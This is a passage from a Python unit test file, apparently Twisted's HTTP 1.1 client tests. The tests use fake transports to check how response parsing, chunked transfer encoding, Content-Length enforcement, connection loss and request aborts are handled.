protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 0\r\n')
protocol.dataReceived('\r\nHere is another thing!')
self.assertEqual(protocol.state, DONE)
self.assertEqual(finished, ['Here is another thing!'])
def test_extraBytesPassedBackHEAD(self):
"""
If extra bytes are received past the end of the headers of a response
to a HEAD request, they are passed to the finish callback.
"""
finished = []
protocol = HTTPClientParser(
Request('HEAD', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 12\r\n')
protocol.dataReceived('\r\nHere is another thing!')
self.assertEqual(protocol.state, DONE)
self.assertEqual(finished, ['Here is another thing!'])
def test_chunkedResponseBody(self):
"""
If the response headers indicate the response body is encoded with the
I{chunked} transfer encoding, the body is decoded according to that
transfer encoding before being passed to L{Response._bodyDataReceived}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Transfer-Encoding: chunked\r\n')
protocol.dataReceived('\r\n')
# No data delivered yet
self.assertEqual(body, [])
# Cannot predict the length of a chunked encoded response body.
self.assertIdentical(protocol.response.length, UNKNOWN_LENGTH)
# Deliver some chunks and make sure the data arrives
protocol.dataReceived('3\r\na')
self.assertEqual(body, ['a'])
protocol.dataReceived('bc\r\n')
self.assertEqual(body, ['a', 'bc'])
# The response's _bodyDataFinished method should be called when the last
# chunk is received. Extra data should be passed to the finished
# callback.
protocol.dataReceived('0\r\n\r\nextra')
self.assertEqual(finished, ['extra'])
def test_unknownContentLength(self):
"""
If a response does not include a I{Transfer-Encoding} or a
I{Content-Length}, the end of response body is indicated by the
connection being closed.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None), finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('\r\n')
protocol.dataReceived('foo')
protocol.dataReceived('bar')
self.assertEqual(body, ['foo', 'bar'])
protocol.connectionLost(ConnectionDone("simulated end of connection"))
self.assertEqual(finished, [''])
def test_contentLengthAndTransferEncoding(self):
"""
According to RFC 2616, section 4.4, point 3, if I{Content-Length} and
I{Transfer-Encoding: chunked} are present, I{Content-Length} MUST be
ignored
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None), finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived(
'Content-Length: 102\r\n'
'Transfer-Encoding: chunked\r\n'
'\r\n'
'3\r\n'
'abc\r\n'
'0\r\n'
'\r\n')
self.assertEqual(body, ['abc'])
self.assertEqual(finished, [''])
def test_connectionLostBeforeBody(self):
"""
If L{HTTPClientParser.connectionLost} is called before the headers are
finished, the C{_responseDeferred} is fired with the L{Failure} passed
to C{connectionLost}.
"""
transport = StringTransport()
protocol = HTTPClientParser(Request('GET', '/', _boringHeaders, None), None)
protocol.makeConnection(transport)
# Grab this here because connectionLost gets rid of the attribute
responseDeferred = protocol._responseDeferred
protocol.connectionLost(Failure(ArbitraryException()))
return assertResponseFailed(
self, responseDeferred, [ArbitraryException])
def test_connectionLostWithError(self):
"""
If one of the L{Response} methods called by
L{HTTPClientParser.connectionLost} raises an exception, the exception
is logged and not re-raised.
"""
transport = StringTransport()
protocol = HTTPClientParser(Request('GET', '/', _boringHeaders, None),
None)
protocol.makeConnection(transport)
response = []
protocol._responseDeferred.addCallback(response.append)
protocol.dataReceived(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 1\r\n'
'\r\n')
response = response[0]
# Arrange for an exception
def fakeBodyDataFinished(err=None):
raise ArbitraryException()
response._bodyDataFinished = fakeBodyDataFinished
protocol.connectionLost(None)
self.assertEqual(len(self.flushLoggedErrors(ArbitraryException)), 1)
class SlowRequest:
"""
L{SlowRequest} is a fake implementation of L{Request} which is easily
controlled externally (for example, by code in a test method).
@ivar stopped: A flag indicating whether C{stopWriting} has been called.
@ivar finished: After C{writeTo} is called, a L{Deferred} which was
returned by that method. L{SlowRequest} will never fire this
L{Deferred}.
"""
method = 'GET'
stopped = False
def writeTo(self, transport):
self.finished = Deferred()
return self.finished
def stopWriting(self):
self.stopped = True
class SimpleRequest:
"""
L{SimpleRequest} is a fake implementation of L{Request} which writes a
short, fixed string to the transport passed to its C{writeTo} method and
returns a succeeded L{Deferred}. This vaguely emulates the behavior of a
L{Request} with no body producer.
"""
def writeTo(self, transport):
transport.write('SOME BYTES')
return succeed(None)
class HTTP11ClientProtocolTests(TestCase):
"""
Tests for the HTTP 1.1 client protocol implementation,
L{HTTP11ClientProtocol}.
"""
def setUp(self):
"""
Create an L{HTTP11ClientProtocol} connected to a fake transport.
"""
self.transport = StringTransport()
self.protocol = HTTP11ClientProtocol()
self.protocol.makeConnection(self.transport)
def test_request(self):
"""
L{HTTP11ClientProtocol.request} accepts a L{Request} and calls its
C{writeTo} method with its own transport.
"""
self.protocol.request(SimpleRequest())
self.assertEqual(self.transport.value(), 'SOME BYTES')
def test_secondRequest(self):
"""
The second time L{HTTP11ClientProtocol.request} is called, it returns a
L{Deferred} which immediately fires with a L{Failure} wrapping a
L{RequestNotSent} exception.
"""
self.protocol.request(SlowRequest())
def cbNotSent(ignored):
self.assertEqual(self.transport.value(), '')
d = self.assertFailure(
self.protocol.request(SimpleRequest()), RequestNotSent)
d.addCallback(cbNotSent)
return d
def test_requestAfterConnectionLost(self):
"""
L{HTTP11ClientProtocol.request} returns a L{Deferred} which immediately
fires with a L{Failure} wrapping a L{RequestNotSent} if called after
the protocol has been disconnected.
"""
self.protocol.connectionLost(
Failure(ConnectionDone("sad transport")))
def cbNotSent(ignored):
self.assertEqual(self.transport.value(), '')
d = self.assertFailure(
self.protocol.request(SimpleRequest()), RequestNotSent)
d.addCallback(cbNotSent)
return d
def test_failedWriteTo(self):
"""
If the L{Deferred} returned by L{Request.writeTo} fires with a
L{Failure}, L{HTTP11ClientProtocol.request} disconnects its transport
and returns a L{Deferred} which fires with a L{Failure} of
L{RequestGenerationFailed} wrapping the underlying failure.
"""
class BrokenRequest:
def writeTo(self, transport):
return fail(ArbitraryException())
d = self.protocol.request(BrokenRequest())
def cbFailed(ignored):
self.assertTrue(self.transport.disconnecting)
# Simulate what would happen if the protocol had a real transport
# and make sure no exception is raised.
self.protocol.connectionLost(
Failure(ConnectionDone("you asked for it")))
d = assertRequestGenerationFailed(self, d, [ArbitraryException])
d.addCallback(cbFailed)
return d
def test_synchronousWriteToError(self):
"""
If L{Request.writeTo} raises an exception,
L{HTTP11ClientProtocol.request} returns a L{Deferred} which fires with
a L{Failure} of L{RequestGenerationFailed} wrapping that exception.
"""
class BrokenRequest:
def writeTo(self, transport):
raise ArbitraryException()
d = self.protocol.request(BrokenRequest())
return assertRequestGenerationFailed(self, d, [ArbitraryException])
def test_connectionLostDuringRequestGeneration(self, mode=None):
"""
If L{HTTP11ClientProtocol}'s transport is disconnected before the
L{Deferred} returned by L{Request.writeTo} fires, the L{Deferred}
returned by L{HTTP11ClientProtocol.request} fires with a L{Failure} of
L{RequestTransmissionFailed} wrapping the underlying failure.
"""
request = SlowRequest()
d = self.protocol.request(request)
d = assertRequestTransmissionFailed(self, d, [ArbitraryException])
# The connection hasn't been lost yet. The request should still be
# allowed to do its thing.
self.assertFalse(request.stopped)
self.protocol.connectionLost(Failure(ArbitraryException()))
# Now the connection has been lost. The request should have been told
# to stop writing itself.
self.assertTrue(request.stopped)
if mode == 'callback':
request.finished.callback(None)
elif mode == 'errback':
request.finished.errback(Failure(AnotherArbitraryException()))
errors = self.flushLoggedErrors(AnotherArbitraryException)
self.assertEqual(len(errors), 1)
else:
# Don't fire the writeTo Deferred at all.
pass
return d
def test_connectionLostBeforeGenerationFinished(self):
"""
If the request passed to L{HTTP11ClientProtocol} finishes generation
successfully after the L{HTTP11ClientProtocol}'s connection has been
lost, nothing happens.
"""
return self.test_connectionLostDuringRequestGeneration('callback')
def test_connectionLostBeforeGenerationFailed(self):
"""
If the request passed to L{HTTP11ClientProtocol} finished generation
with an error after the L{HTTP11ClientProtocol}'s connection has been
lost, nothing happens.
"""
return self.test_connectionLostDuringRequestGeneration('errback')
def test_errorMessageOnConnectionLostBeforeGenerationFailedDoesNotConfuse(self):
"""
If the request passed to L{HTTP11ClientProtocol} finished generation
with an error after the L{HTTP11ClientProtocol}'s connection has been
lost, an error is logged that gives a non-confusing hint to user on what
went wrong.
"""
errors = []
log.addObserver(errors.append)
self.addCleanup(log.removeObserver, errors.append)
def check(ignore):
error = errors[0]
self.assertEquals(error['why'],
'Error writing request, but not in valid state '
'to finalize request: CONNECTION_LOST')
return self.test_connectionLostDuringRequestGeneration(
'errback').addCallback(check)
def test_receiveSimplestResponse(self):
"""
When a response is delivered to L{HTTP11ClientProtocol}, the
L{Deferred} previously returned by the C{request} method is called back
with a L{Response} instance and the connection is closed.
"""
d = self.protocol.request(Request('GET', '/', _boringHeaders, None))
def cbRequest(response):
self.assertEqual(response.code, 200)
self.assertEqual(response.headers, Headers())
self.assertTrue(self.transport.disconnecting)
d.addCallback(cbRequest)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 0\r\n"
"\r\n")
return d
def test_receiveResponseHeaders(self):
"""
The headers included in a response delivered to L{HTTP11ClientProtocol}
are included on the L{Response} instance passed to the callback
returned by the C{request} method.
"""
d = self.protocol.request(Request('GET', '/', _boringHeaders, None))
def cbRequest(response):
expected = Headers({'x-foo': ['bar', 'baz']})
self.assertEqual(response.headers, expected)
d.addCallback(cbRequest)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"X-Foo: bar\r\n"
"X-Foo: baz\r\n"
"\r\n")
return d
def test_receiveResponseBeforeRequestGenerationDone(self):
"""
If response bytes are delivered to L{HTTP11ClientProtocol} before the
L{Deferred} returned by L{Request.writeTo} fires, those response bytes
are parsed as part of the response.
"""
request = SlowRequest()
d = self.protocol.request(request)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"X-Foo: bar\r\n"
"Content-Length: 6\r\n"
"\r\n"
"foobar")
def cbResponse(response):
p = AccumulatingProtocol()
whenFinished = p.closedDeferred = Deferred()
response.deliverBody(p)
return whenFinished.addCallback(
lambda ign: (response, p.data))
d.addCallback(cbResponse)
def cbAllResponse((response, body)):
self.assertEqual(response.version, ('HTTP', 1, 1))
self.assertEqual(response.code, 200)
self.assertEqual(response.phrase, 'OK')
self.assertEqual(response.headers, Headers({'x-foo': ['bar']}))
self.assertEqual(body, "foobar")
# Also nothing bad should happen if the request does finally
# finish, even though it is completely irrelevant.
request.finished.callback(None)
d.addCallback(cbAllResponse)
return d
def test_receiveResponseBody(self):
"""
The C{deliverBody} method of the response object with which the
L{Deferred} returned by L{HTTP11ClientProtocol.request} fires can be
used to get the body of the response.
"""
protocol = AccumulatingProtocol()
whenFinished = protocol.closedDeferred = Deferred()
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 6\r\n"
"\r")
# Here's what's going on: all the response headers have been delivered
# by this point, so the request Deferred can fire with a Response
# object. The body is yet to come, but that's okay, because the
# Response object is how you *get* the body.
result = []
requestDeferred.addCallback(result.append)
self.assertEqual(result, [])
# Deliver the very last byte of the response. It is exactly at this
# point which the Deferred returned by request should fire.
self.protocol.dataReceived("\n")
response = result[0]
response.deliverBody(protocol)
self.protocol.dataReceived("foo")
self.protocol.dataReceived("bar")
def cbAllResponse(ignored):
self.assertEqual(protocol.data, "foobar")
protocol.closedReason.trap(ResponseDone)
whenFinished.addCallback(cbAllResponse)
return whenFinished
def test_responseBodyFinishedWhenConnectionLostWhenContentLengthIsUnknown(
self):
"""
If the length of the response body is unknown, the protocol passed to
the response's C{deliverBody} method has its C{connectionLost}
method called with a L{Failure} wrapping a L{PotentialDataLoss}
exception.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"\r\n")
result = []
requestDeferred.addCallback(result.append)
response = result[0]
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.protocol.dataReceived("foo")
self.protocol.dataReceived("bar")
self.assertEqual(protocol.data, "foobar")
self.protocol.connectionLost(
Failure(ConnectionDone("low-level transport disconnected")))
protocol.closedReason.trap(PotentialDataLoss)
def test_chunkedResponseBodyUnfinishedWhenConnectionLost(self):
"""
If the final chunk has not been received when the connection is lost
(for any reason), the protocol passed to C{deliverBody} has its
C{connectionLost} method called with a L{Failure} wrapping the
exception for that reason.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Transfer-Encoding: chunked\r\n"
"\r\n")
result = []
requestDeferred.addCallback(result.append)
response = result[0]
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.protocol.dataReceived("3\r\nfoo\r\n")
self.protocol.dataReceived("3\r\nbar\r\n")
self.assertEqual(protocol.data, "foobar")
self.protocol.connectionLost(Failure(ArbitraryException()))
return assertResponseFailed(
self, fail(protocol.closedReason), [ArbitraryException, _DataLoss])
def test_parserDataReceivedException(self):
"""
If the parser L{HTTP11ClientProtocol} delivers bytes to in
C{dataReceived} raises an exception, the exception is wrapped in a
L{Failure} and passed to the parser's C{connectionLost} and then the
L{HTTP11ClientProtocol}'s transport is disconnected.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived('unparseable garbage goes here\r\n')
d = assertResponseFailed(self, requestDeferred, [ParseError])
def cbFailed(exc):
self.assertTrue(self.transport.disconnecting)
self.assertEqual(
exc.reasons[0].value.data, 'unparseable garbage goes here')
# Now do what StringTransport doesn't do but a real transport would
# have, call connectionLost on the HTTP11ClientProtocol. Nothing
# is asserted about this, but it's important for it to not raise an
# exception.
self.protocol.connectionLost(Failure(ConnectionDone("it is done")))
d.addCallback(cbFailed)
return d
def test_proxyStopped(self):
"""
When the HTTP response parser is disconnected, the
L{TransportProxyProducer} which was connected to it as a transport is
stopped.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
transport = self.protocol._parser.transport
self.assertIdentical(transport._producer, self.transport)
self.protocol._disconnectParser(Failure(ConnectionDone("connection done")))
self.assertIdentical(transport._producer, None)
return assertResponseFailed(self, requestDeferred, [ConnectionDone])
def test_abortClosesConnection(self):
"""
The transport will be told to close its connection when
L{HTTP11ClientProtocol.abort} is invoked.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
protocol.abort()
self.assertTrue(transport.disconnecting)
def test_abortBeforeResponseBody(self):
"""
The Deferred returned by L{HTTP11ClientProtocol.request} will fire
with a L{ResponseFailed} failure containing a L{ConnectionAborted}
exception, if the connection was aborted before all response headers
have been received.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
result = protocol.request(Request('GET', '/', _boringHeaders, None))
protocol.abort()
self.assertTrue(transport.disconnecting)
protocol.connectionLost(Failure(ConnectionDone()))
return assertResponseFailed(self, result, [ConnectionAborted])
def test_abortAfterResponseHeaders(self):
"""
When the connection is aborted after the response headers have
been received and the L{Response} has been made available to
application code, the response body protocol's C{connectionLost}
method will be invoked with a L{ResponseFailed} failure containing a
L{ConnectionAborted} exception.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
result = protocol.request(Request('GET', '/', _boringHeaders, None))
protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 1\r\n"
"\r\n"
)
testResult = Deferred()
class BodyDestination(Protocol):
"""
A body response protocol which immediately aborts the HTTP
connection.
"""
def connectionMade(self):
"""
Abort the HTTP connection.
"""
protocol.abort()
def connectionLost(self, reason):
"""
Make the reason for the losing of the connection available to
the unit test via C{testResult}.
"""
testResult.errback(reason)
def deliverBody(response):
"""
Connect the L{BodyDestination} response body protocol to the
response, and then simulate connection loss after ensuring that
the HTTP connection has been aborted.
"""
response.deliverBody(BodyDestination())
self.assertTrue(transport.disconnecting)
protocol.connectionLost(Failure(ConnectionDone()))
result.addCallback(deliverBody)
return assertResponseFailed(self, testResult,
[ConnectionAborted, _DataLoss])
class StringProducer:
"""
L{StringProducer} is a dummy body producer.
@ivar stopped: A flag which indicates whether or not C{stopProducing} has
been called.
@ivar consumer: After C{startProducing} is called, the value of the
C{consumer} argument to that method.
@ivar finished: After C{startProducing} is called, a L{Deferred} which was
returned by that method. L{StringProducer} will never fire this
L{Deferred}.
"""
implements(IBodyProducer)
stopped = False
def __init__(self, length):
self.length = length
def startProducing(self, consumer):
self.consumer = consumer
self.finished = Deferred()
return self.finished
def stopProducing(self):
self.stopped = True
class RequestTests(TestCase):
"""
Tests for L{Request}.
"""
def setUp(self):
self.transport = StringTransport()
def test_sendSimplestRequest(self):
"""
L{Request.writeTo} formats the request data and writes it to the given
transport.
"""
Request('GET', '/', _boringHeaders, None).writeTo(self.transport)
self.assertEqual(
self.transport.value(),
"GET / HTTP/1.1\r\n"
"Connection: close\r\n"
"Host: example.com\r\n"
"\r\n")
def test_sendRequestHeaders(self):
"""
L{Request.writeTo} formats header data and writes it to the given
transport.
"""
headers = Headers({'x-foo': ['bar', 'baz'], 'host': ['example.com']})
Request('GET', '/foo', headers, None).writeTo(self.transport)
lines = self.transport.value().split('\r\n')
self.assertEqual(lines[0], "GET /foo HTTP/1.1")
self.assertEqual(lines[-2:], ["", ""])
del lines[0], lines[-2:]
lines.sort()
self.assertEqual(
lines,
["Connection: close",
"Host: example.com",
"X-Foo: bar",
"X-Foo: baz"])
def test_sendChunkedRequestBody(self):
"""
L{Request.writeTo} uses chunked encoding to write data from the request
body producer to the given transport. It registers the request body
producer with the transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
request.writeTo(self.transport)
self.assertNotIdentical(producer.consumer, None)
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Transfer-Encoding: chunked\r\n"
"Host: example.com\r\n"
"\r\n")
self.transport.clear()
producer.consumer.write('x' * 3)
producer.consumer.write('y' * 15)
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
self.assertEqual(
self.transport.value(),
"3\r\n"
"xxx\r\n"
"f\r\n"
"yyyyyyyyyyyyyyy\r\n"
"0\r\n"
"\r\n")
def test_sendChunkedRequestBodyWithError(self):
"""
If L{Request} is created with a C{bodyProducer} without a known length
and the L{Deferred} returned from its C{startProducing} method fires
with a L{Failure}, the L{Deferred} returned by L{Request.writeTo} fires
with that L{Failure} and the body producer is unregistered from the
transport. The final zero-length chunk is not written to the
transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
self.transport.clear()
producer.finished.errback(ArbitraryException())
def cbFailed(ignored):
self.assertEqual(self.transport.value(), "")
self.assertIdentical(self.transport.producer, None)
d = self.assertFailure(writeDeferred, ArbitraryException)
d.addCallback(cbFailed)
return d
def test_sendRequestBodyWithLength(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length,
that length is sent as the value for the I{Content-Length} header and
chunked encoding is not used.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
request.writeTo(self.transport)
self.assertNotIdentical(producer.consumer, None)
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 3\r\n"
"Host: example.com\r\n"
"\r\n")
self.transport.clear()
producer.consumer.write('abc')
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
self.assertEqual(self.transport.value(), "abc")
def test_sendRequestBodyWithTooFewBytes(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length and
the producer does not produce that many bytes, the L{Deferred} returned
by L{Request.writeTo} fires with a L{Failure} wrapping a
L{WrongBodyLength} exception.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
return self.assertFailure(writeDeferred, WrongBodyLength)
def _sendRequestBodyWithTooManyBytesTest(self, finisher):
"""
Verify that when too many bytes have been written by a body producer
and then the body producer's C{startProducing} L{Deferred} fires that
the producer is unregistered from the transport and that the
L{Deferred} returned from L{Request.writeTo} is fired with a L{Failure}
wrapping a L{WrongBodyLength}.
@param finisher: A callable which will be invoked with the body
producer after too many bytes have been written to the transport.
It should fire the startProducing Deferred somehow.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
# The producer hasn't misbehaved yet, so it shouldn't have been
# stopped.
self.assertFalse(producer.stopped)
producer.consumer.write('cd')
# Now the producer *has* misbehaved, so we should have tried to
# make it stop.
self.assertTrue(producer.stopped)
# The transport should have had the producer unregistered from it as
# well.
self.assertIdentical(self.transport.producer, None)
def cbFailed(exc):
# The "cd" should not have been written to the transport because
# the request can now locally be recognized to be invalid. If we
# had written the extra bytes, the server could have decided to
# start processing the request, which would be bad since we're
# going to indicate failure locally.
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 3\r\n"
"Host: example.com\r\n"
"\r\n"
"ab")
self.transport.clear()
# Subsequent writes should be ignored, as should firing the
# Deferred returned from startProducing.
self.assertRaises(ExcessWrite, producer.consumer.write, 'ef')
# Likewise, if the Deferred returned from startProducing fires,
# this should more or less be ignored (aside from possibly logging
# an error).
finisher(producer)
# There should have been nothing further written to the transport.
self.assertEqual(self.transport.value(), "")
d = self.assertFailure(writeDeferred, WrongBodyLength)
d.addCallback(cbFailed)
return d
def test_sendRequestBodyWithTooManyBytes(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length and
the producer tries to produce more than than many bytes, the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping a L{WrongBodyLength} exception.
"""
def finisher(producer):
producer.finished.callback(None)
return self._sendRequestBodyWithTooManyBytesTest(finisher)
def test_sendRequestBodyErrorWithTooManyBytes(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length and
the producer tries to produce more than than many bytes, the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping a L{WrongBodyLength} exception.
"""
def finisher(producer):
producer.finished.errback(ArbitraryException())
errors = self.flushLoggedErrors(ArbitraryException)
self.assertEqual(len(errors), 1)
return self._sendRequestBodyWithTooManyBytesTest(finisher)
def test_sendRequestBodyErrorWithConsumerError(self):
"""
Though there should be no way for the internal C{finishedConsuming}
L{Deferred} in L{Request._writeToContentLength} to fire a L{Failure}
after the C{finishedProducing} L{Deferred} has fired, in case this does
happen, the error should be logged with a message about how there's
probably a bug in L{Request}.
This is a whitebox test.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
finishedConsuming = producer.consumer._finished
producer.consumer.write('abc')
producer.finished.callback(None)
finishedConsuming.errback(ArbitraryException())
self.assertEqual(len(self.flushLoggedErrors(ArbitraryException)), 1)
def _sendRequestBodyFinishedEarlyThenTooManyBytes(self, finisher):
"""
Verify that if the body producer fires its Deferred and then keeps
writing to the consumer that the extra writes are ignored and the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping the most appropriate exception type.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
finisher(producer)
self.assertIdentical(self.transport.producer, None)
self.transport.clear()
self.assertRaises(ExcessWrite, producer.consumer.write, 'cd')
self.assertEqual(self.transport.value(), "")
return writeDeferred
def test_sendRequestBodyFinishedEarlyThenTooManyBytes(self):
"""
If the request body producer indicates it is done by firing the
L{Deferred} returned from its C{startProducing} method but then goes on
to write too many bytes, the L{Deferred} returned by {Request.writeTo}
fires with a L{Failure} wrapping L{WrongBodyLength}.
"""
def finisher(producer):
producer.finished.callback(None)
return self.assertFailure(
self._sendRequestBodyFinishedEarlyThenTooManyBytes(finisher),
WrongBodyLength)
def test_sendRequestBodyErroredEarlyThenTooManyBytes(self):
"""
If the request body producer indicates an error by firing the
L{Deferred} returned from its C{startProducing} method but then goes on
to write too many bytes, the L{Deferred} returned by {Request.writeTo}
fires with that L{Failure} and L{WrongBodyLength} is logged.
"""
def finisher(producer):
producer.finished.errback(ArbitraryException())
return self.assertFailure(
self._sendRequestBodyFinishedEarlyThenTooManyBytes(finisher),
ArbitraryException)
def test_sendChunkedRequestBodyFinishedThenWriteMore(self, _with=None):
"""
If the request body producer with an unknown length tries to write
after firing the L{Deferred} returned by its C{startProducing} method,
the C{write} call raises an exception and does not write anything to
the underlying transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.finished.callback(_with)
self.transport.clear()
self.assertRaises(ExcessWrite, producer.consumer.write, 'foo')
self.assertEqual(self.transport.value(), "")
return writeDeferred
def test_sendChunkedRequestBodyFinishedWithErrorThenWriteMore(self):
"""
If the request body producer with an unknown length tries to write
after firing the L{Deferred} returned by its C{startProducing} method
with a L{Failure}, the C{write} call raises an exception and does not
write anything to the underlying transport.
"""
d = self.test_sendChunkedRequestBodyFinishedThenWriteMore(
Failure(ArbitraryException()))
return self.assertFailure(d, ArbitraryException)
def test_sendRequestBodyWithError(self):
"""
If the L{Deferred} returned from the C{startProducing} method of the
L{IBodyProducer} passed to L{Request} fires with a L{Failure}, the
L{Deferred} returned from L{Request.writeTo} fails with that
L{Failure}.
"""
producer = StringProducer(5)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
# Sanity check - the producer should be registered with the underlying
# transport.
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
producer.consumer.write('ab')
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 5\r\n"
"Host: example.com\r\n"
"\r\n"
"ab")
self.assertFalse(self.transport.disconnecting)
producer.finished.errback(Failure(ArbitraryException()))
# Disconnection is handled by a higher level. Request should leave the
# transport alone in this case.
self.assertFalse(self.transport.disconnecting)
# Oh. Except it should unregister the producer that it registered.
self.assertIdentical(self.transport.producer, None)
return self.assertFailure(writeDeferred, ArbitraryException)
def test_hostHeaderRequired(self):
"""
L{Request.writeTo} raises L{BadHeaders} if there is not exactly one
I{Host} header and writes nothing to the given transport.
"""
request = Request('GET', '/', Headers({}), None)
self.assertRaises(BadHeaders, request.writeTo, self.transport)
self.assertEqual(self.transport.value(), '')
request = Request('GET', '/', Headers({'Host': ['example.com', 'example.org']}), None)
self.assertRaises(BadHeaders, request.writeTo, self.transport)
self.assertEqual(self.transport.value(), '')
def test_stopWriting(self):
"""
L{Request.stopWriting} calls its body producer's C{stopProducing}
method.
"""
producer = StringProducer(3)
request = Request('GET', '/', _boringHeaders, producer)
d = request.writeTo(self.transport)
self.assertFalse(producer.stopped)
request.stopWriting()
self.assertTrue(producer.stopped)
def test_brokenStopProducing(self):
"""
If the body producer's C{stopProducing} method raises an exception,
L{Request.stopWriting} logs it and does not re-raise it.
"""
producer = StringProducer(3)
def brokenStopProducing():
raise ArbitraryException("stopProducing is busted")
producer.stopProducing = brokenStopProducing
request = Request('GET', '/', _boringHeaders, producer)
d = request.writeTo(self.transport)
request.stopWriting()
self.assertEqual(
len(self.flushLoggedErrors(ArbitraryException)), 1)
class LengthEnforcingConsumerTests(TestCase):
"""
Tests for L{LengthEnforcingConsumer}.
"""
def setUp(self):
self.result = Deferred()
self.producer = StringProducer(10)
self.transport = StringTransport()
self.enforcer = LengthEnforcingConsumer(
self.producer, self.transport, self.result)
def test_write(self):
"""
L{LengthEnforcingConsumer.write} calls the wrapped consumer's C{write}
method with the bytes it is passed as long as there are fewer of them
than the C{length} attribute indicates remain to be received.
"""
self.enforcer.write('abc')
self.assertEqual(self.transport.value(), 'abc')
self.transport.clear()
self.enforcer.write('def')
self.assertEqual(self.transport.value(), 'def')
def test_finishedEarly(self):
"""
L{LengthEnforcingConsumer._noMoreWritesExpected} raises
L{WrongBodyLength} if it is called before the indicated number of bytes
have been written.
"""
self.enforcer.write('x' * 9)
self.assertRaises(WrongBodyLength, self.enforcer._noMoreWritesExpected)
def test_writeTooMany(self, _unregisterAfter=False):
"""
If it is called with a total number of bytes exceeding the indicated
limit passed to L{LengthEnforcingConsumer.__init__},
L{LengthEnforcingConsumer.write} fires the L{Deferred} with a
L{Failure} wrapping a L{WrongBodyLength} and also calls the
C{stopProducing} method of the producer.
"""
self.enforcer.write('x' * 10)
self.assertFalse(self.producer.stopped)
self.enforcer.write('x')
self.assertTrue(self.producer.stopped)
if _unregisterAfter:
self.enforcer._noMoreWritesExpected()
return self.assertFailure(self.result, WrongBodyLength)
def test_writeAfterNoMoreExpected(self):
"""
If L{LengthEnforcingConsumer.write} is called after
L{LengthEnforcingConsumer._noMoreWritesExpected}, it calls the
